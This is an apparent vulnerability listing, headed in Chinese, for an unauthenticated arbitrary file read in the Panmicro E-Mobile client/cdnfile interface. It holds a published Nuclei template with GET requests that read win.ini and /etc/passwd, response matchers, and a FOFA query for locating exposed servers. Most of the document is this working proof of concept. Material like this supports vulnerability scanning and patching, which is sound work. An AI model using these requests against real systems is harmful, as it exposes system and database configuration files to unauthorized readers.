漏洞描述
The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
panmicro-arbitrary-file-read: Panmicro E-Mobile System - Arbitrary File Read
PoC代码[已公开]
id: panmicro-arbitrary-file-read
info:
name: Panmicro E-Mobile System - Arbitrary File Read
author: s4e-io
severity: high
description: |
The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
reference:
- http://cn-sec.com/archives/3182931.html
- https://cn-sec.com/archives/3188605.html
metadata:
verified: true
max-request: 2
vendor: panmicro
product: e-mobile-system
fofa-query: app="泛微-EMobile"
tags: panmicro,e-mobile,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/client/cdnfile/1C/Windows/win.ini?windows"
- "{{BaseURL}}/client/cdnfile/C/etc/passwd?linux"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions") || regex("root:.*:0:0:", body)'
- 'contains_any(header,"application/octet-stream", "text/plain")'
- 'contains(header," attachment; filename=")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502205f341075adc19dc549dcae50179197ddda37232e1fbbad2116fd0b9476a7f25f022100cc87b03630e3320b8141c32c02453efd0a23ebdf28c1c1ef6c32bf218dc52c20:922c64590222798bb761d5b6d8e72950